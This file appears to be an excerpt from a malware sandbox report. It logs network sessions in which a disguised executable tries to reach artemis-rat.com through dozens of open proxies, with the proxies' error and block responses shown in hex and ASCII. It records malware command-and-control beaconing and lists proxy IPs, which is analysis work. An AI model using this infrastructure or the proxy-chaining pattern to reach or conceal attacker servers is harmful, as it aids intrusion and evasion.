                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 41 65 72 6f 68 69 76 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 57 65 62 20 50 61 67 65 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 35 62 38 63 62 64 3b 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 61 6e 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 77 65 62 20 70 61 67 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 6e 65 74 77 6f 72 6b 20 70 6f 6c 69 63 79 2e 20 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 43 61 74 65 67 6f 72 79 3a 20 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 22 3e 47 65 6e 65 72 61 74 65 64 20 4d 6f 6e 2c 20 31 31 20 4d 61 72 20 32 30 32 34 20 31 35 3a 31 36 3a 34 32 20 47 4d 54 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                        Data Ascii: <html><head><meta type="copyright" content="Copyright (C) 1996-2018 The Aerohive"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: Web Page Blocked</title><style type="text/css">... body:lang(fa) { direction: rtl; font-size: 100%; font-family: Tahoma, Roya, sans-serif; float: right; }:lang(he) { direction: rtl; } --></style></head><body id="ERR_ACCESS_DENIED"><div id="titles"><h1 style="color: #5b8cbd;">The requested URL cannot be retrieved</h1></div><div id="content"><p>Access to the web page has been blocked in accordance with the network policy. If you believe this is an error, please contact you system administrator.</p><p style="color: #7192b4;">URL: <a href="https://artemis-rat.com/*">https://artemis-rat.com/*</a></p><p style="color: #7192b4;">Category: </p><br></div><div id="footer"><p style="font-size: 12px;">Generated Mon, 11 Mar 2024 15:16:42 GMT</p></div></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        652192.168.2.951757221.153.92.39807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.315120935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.618593931 CET310INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Content-Length: 150
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        653192.168.2.95165158.246.58.15090027672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.316451073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.695466042 CET311INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 166
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        654192.168.2.952021104.27.8.161807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.318671942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.474402905 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        655192.168.2.951411134.35.179.8180807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.318674088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.886121035 CET202INHTTP/1.0 403 Forbidden
                                                                                        Content-Length: 304
                                                                                        Content-Type: text/html
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Expires: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Server: Mikrotik HttpProxy
                                                                                        Proxy-Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        656192.168.2.95220943.153.64.664437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.321615934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        657192.168.2.95221643.153.64.664437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.323416948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        658192.168.2.951782211.222.252.187807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.324004889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        659192.168.2.95193066.228.33.190448097672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.330590963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.866796970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.664257050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.070255041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.773659945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:50.576359034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:53.273464918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:58.773380041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:09.663726091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        660192.168.2.951748193.239.58.9280817672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.368901968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        661192.168.2.951852174.77.111.198495477672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.369322062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        662192.168.2.94972520.219.180.14931297672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.370266914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.774184942 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        663192.168.2.951791140.82.35.234444447672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.370467901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:27.263206005 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                                        Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        664192.168.2.951801147.75.34.85807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.371678114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.677514076 CET356INHTTP/1.0 502 Bad Gateway
                                                                                        Server: Zscaler/6.3
                                                                                        Content-Type: text/html
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 31 3e 44 4e 53 20 65 72 72 6f 72 3c 2f 68 31 3e 0d 0a 3c 70 3e 44 4e 53 20 65 72 72 6f 72 20 28 74 68 65 20 68 6f 73 74 20 6e 61 6d 65 20 6f 66 20 74 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 29 3c 62 72 3e 3c 62 72 3e 50 6c 65 61 73 65 20 63 68 65 63 6b 20 74 68 61 74 20 74 68 65 20 68 6f 73 74 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 73 70 65 6c 6c 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 62 72 3e 3c 2f 70 3e 0d 0a 3c 21 2d 2d 5a 73 63 61 6c 65 72 2f 36 2e 33 2d 2d 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><h1>DNS error</h1><p>DNS error (the host name of the page you are looking for does not exist)<br><br>Please check that the host name has been spelled correctly.<br></p>...Zscaler/6.3--></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        665192.168.2.95101960.188.102.225180807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.372711897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        666192.168.2.95197567.43.228.25356337672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.373322010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        667192.168.2.952008146.19.106.194123347672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.374857903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        668192.168.2.951754103.200.135.22941457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.380542040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        669192.168.2.951826103.199.18.248807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.382209063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.715889931 CET176INHTTP/1.1 404 Not Found
                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Content-Length: 19
                                                                                        Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                                                        Data Ascii: 404 page not found


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        670192.168.2.95193472.210.252.13741457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:42.400799036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
